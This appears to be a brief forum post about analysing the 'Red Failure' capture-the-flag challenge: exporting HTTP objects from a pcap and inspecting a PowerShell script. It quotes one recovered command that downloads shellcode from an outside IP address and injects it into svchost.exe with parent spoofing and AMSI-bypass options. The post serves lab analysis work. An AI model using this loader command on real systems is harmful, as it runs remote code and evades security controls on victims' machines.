Let’s discuss Red Failure
. Please do not share any flags or writeups.
Exported http objects from the pcap file
Inspected the ps script
PS C:\> ${c`MD}
currentthread /sc:http://147.182.172.189:80/9tVI0 /password:z64&Rx27Z$B%73up /image:C:\Windows\System32\svchost.exe /pid:notepad /ppid:explorer /dll:msvcp_win.dll /blockDlls:True /am51:True
That’s it with RE Corner - scdbg download